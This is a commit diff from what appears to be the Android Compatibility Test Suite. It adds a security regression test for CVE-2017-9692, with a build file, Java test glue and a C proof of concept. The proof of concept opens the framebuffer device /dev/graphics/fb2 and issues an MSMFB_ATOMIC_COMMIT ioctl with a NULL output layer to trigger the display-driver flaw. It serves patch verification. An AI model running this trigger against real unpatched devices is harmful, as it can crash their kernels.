CTS/STS test for Android Security b/36731152

Bug:36731152
Change-Id: I1e1ce228578421e31c71218ea05fb64f3530ec63
diff --git a/hostsidetests/security/AndroidTest.xml b/hostsidetests/security/AndroidTest.xml
index cc5265f..12e8918a 100644
--- a/hostsidetests/security/AndroidTest.xml
+++ b/hostsidetests/security/AndroidTest.xml
@@ -99,6 +99,7 @@
         <option name="push" value="Bug-36266767->/data/local/tmp/Bug-36266767" />
         <option name="push" value="Bug-36591162->/data/local/tmp/Bug-36591162" />
         <option name="push" value="CVE-2017-9678->/data/local/tmp/CVE-2017-9678" />
+        <option name="push" value="CVE-2017-9692->/data/local/tmp/CVE-2017-9692" />
 
         <option name="append-bitness" value="true" />
     </target_preparer>
diff --git a/hostsidetests/security/securityPatch/CVE-2017-9692/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-9692/Android.mk
new file mode 100644
index 0000000..fa5539b
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-9692/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#      http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-9692
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-9692/poc.c b/hostsidetests/security/securityPatch/CVE-2017-9692/poc.c
new file mode 100644
index 0000000..7b4de81
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-9692/poc.c
@@ -0,0 +1,209 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#define GNU_SOURCE
+#include <errno.h>
+#include <fcntl.h>
+#include <linux/types.h>
+#include <pthread.h>
+#include <stdio.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <sys/socket.h>
+#include <sys/stat.h>
+#include <sys/time.h>
+#include <sys/types.h>
+#include <unistd.h>
+
+#ifndef _IOC_NONE
+#define _IOC_NONE 0U
+#endif
+
+#ifndef _IOC_WRITE
+#define _IOC_WRITE 1U
+#endif
+
+#ifndef _IOC_READ
+#define _IOC_READ 2U
+#endif
+
+#define _IOC_NRBITS 8
+#define _IOC_TYPEBITS 8
+
+#ifndef _IOC_SIZEBITS
+#define _IOC_SIZEBITS 14
+#endif
+
+#ifndef _IOC_DIRBITS
+#define _IOC_DIRBITS 2
+#endif
+
+#define _IOC_NRMASK ((1 << _IOC_NRBITS) - 1)
+#define _IOC_TYPEMASK ((1 << _IOC_TYPEBITS) - 1)
+#define _IOC_SIZEMASK ((1 << _IOC_SIZEBITS) - 1)
+#define _IOC_DIRMASK ((1 << _IOC_DIRBITS) - 1)
+
+#define _IOC_NRSHIFT 0
+#define _IOC_TYPESHIFT (_IOC_NRSHIFT + _IOC_NRBITS)
+#define _IOC_SIZESHIFT (_IOC_TYPESHIFT + _IOC_TYPEBITS)
+#define _IOC_DIRSHIFT (_IOC_SIZESHIFT + _IOC_SIZEBITS)
+
+#define _IOC(dir, type, nr, size)                          \
+  (((dir) << _IOC_DIRSHIFT) | ((type) << _IOC_TYPESHIFT) | \
+   ((nr) << _IOC_NRSHIFT) | ((size) << _IOC_SIZESHIFT))
+
+#ifndef __KERNEL__
+#define _IOC_TYPECHECK(t) (sizeof(t))
+#endif
+
+#define _IO(type, nr) _IOC(_IOC_NONE, (type), (nr), 0)
+#define _IOR(type, nr, size) \
+  _IOC(_IOC_READ, (type), (nr), (_IOC_TYPECHECK(size)))
+#define _IOW(type, nr, size) \
+  _IOC(_IOC_WRITE, (type), (nr), (_IOC_TYPECHECK(size)))
+#define _IOWR(type, nr, size) \
+  _IOC(_IOC_READ | _IOC_WRITE, (type), (nr), (_IOC_TYPECHECK(size)))
+#define _IOR_BAD(type, nr, size) _IOC(_IOC_READ, (type), (nr), sizeof(size))
+#define _IOW_BAD(type, nr, size) _IOC(_IOC_WRITE, (type), (nr), sizeof(size))
+#define _IOWR_BAD(type, nr, size) \
+  _IOC(_IOC_READ | _IOC_WRITE, (type), (nr), sizeof(size))
+
+#define MDP_IOCTL_MAGIC 'S'
+#define MSMFB_ATOMIC_COMMIT _IOWR(MDP_IOCTL_MAGIC, 128, void *)
+
+#define MDP_COMMIT_VERSION_1_0 0x00010000
+#define MDP_VALIDATE_LAYER 0x01
+
+#ifdef __LP64
+#define MDP_LAYER_COMMIT_V1_PAD 3
+#else
+#define MDP_LAYER_COMMIT_V1_PAD 4
+#endif
+
+#define MAX_PLANES 4
+
+struct mult_factor {
+  uint32_t numer;
+  uint32_t denom;
+};
+
+enum mdp_color_space {
+  MDP_CSC_ITU_R_601,
+  MDP_CSC_ITU_R_601_FR,
+  MDP_CSC_ITU_R_709,
+};
+
+enum mdss_mdp_blend_op {
+  BLEND_OP_NOT_DEFINED = 0,
+  BLEND_OP_OPAQUE,
+  BLEND_OP_PREMULTIPLIED,
+  BLEND_OP_COVERAGE,
+  BLEND_OP_MAX,
+};
+
+struct mdp_rect {
+  uint32_t x;
+  uint32_t y;
+  uint32_t w;
+  uint32_t h;
+};
+
+struct mdp_layer_plane {
+  int fd;
+  uint32_t offset;
+  uint32_t stride;
+};
+
+struct mdp_layer_commit_v1 {
+  uint32_t flags;
+  int release_fence;
+  struct mdp_rect left_roi;
+  struct mdp_rect right_roi;
+  struct mdp_input_layer __user *input_layers;
+  uint32_t input_layer_cnt;
+  struct mdp_output_layer __user *output_layer;
+  int retire_fence;
+  void __user *dest_scaler;
+  uint32_t dest_scaler_cnt;
+  uint32_t reserved[MDP_LAYER_COMMIT_V1_PAD];
+};
+
+struct mdp_layer_commit {
+  uint32_t version;
+  union {
+    struct mdp_layer_commit_v1 commit_v1;
+  };
+};
+
+struct mdp_layer_buffer {
+  uint32_t width;
+  uint32_t height;
+  uint32_t format;
+  struct mdp_layer_plane planes[MAX_PLANES];
+  uint32_t plane_count;
+  struct mult_factor comp_ratio;
+  int fence;
+  uint32_t reserved;
+};
+
+struct mdp_output_layer {
+  uint32_t flags;
+  uint32_t writeback_ndx;
+  struct mdp_layer_buffer buffer;
+  enum mdp_color_space color_space;
+  uint32_t reserved[5];
+};
+
+struct mdp_input_layer {
+  uint32_t flags;
+  uint32_t pipe_ndx;
+  uint8_t horz_deci;
+  uint8_t vert_deci;
+  uint8_t alpha;
+  uint16_t z_order;
+  uint32_t transp_mask;
+  uint32_t bg_color;
+  enum mdss_mdp_blend_op blend_op;
+  enum mdp_color_space color_space;
+  struct mdp_rect src_rect;
+  struct mdp_rect dst_rect;
+  void __user *scale;
+  struct mdp_layer_buffer buffer;
+  void __user *pp_info;
+  int error_code;
+  uint32_t reserved[6];
+};
+
+int main() {
+  int fd;
+  struct mdp_layer_commit commit;
+  struct mdp_output_layer output_layer;
+
+  fd = open("/dev/graphics/fb2", O_RDWR, 0);
+  if (fd < 0) {
+    return -1;
+  }
+
+  memset(&commit, 0, sizeof(struct mdp_layer_commit));
+  commit.version = MDP_COMMIT_VERSION_1_0;
+
+  memset(&output_layer, 0, sizeof(output_layer));
+  commit.commit_v1.output_layer = (struct mdp_output_layer *)NULL;
+  commit.commit_v1.flags |= MDP_VALIDATE_LAYER;
+  ioctl(fd, MSMFB_ATOMIC_COMMIT, &commit);
+
+  return 0;
+}
diff --git a/hostsidetests/security/src/android/security/cts/Poc17_08.java b/hostsidetests/security/src/android/security/cts/Poc17_08.java
index de4a3c9..1d993bb 100644
--- a/hostsidetests/security/src/android/security/cts/Poc17_08.java
+++ b/hostsidetests/security/src/android/security/cts/Poc17_08.java
@@ -51,4 +51,15 @@
             AdbUtils.runPoc("CVE-2017-9678", getDevice(), 60);
         }
     }
+
+    /**
+     *  b/36731152
+     */
+    @SecurityTest
+    public void testPocCVE_2017_9692() throws Exception {
+        enableAdbRoot(getDevice());
+        if(containsDriver(getDevice(), "/dev/graphics/fb2")) {
+            AdbUtils.runPoc("CVE-2017-9692", getDevice(), 60);
+        }
+    }
 }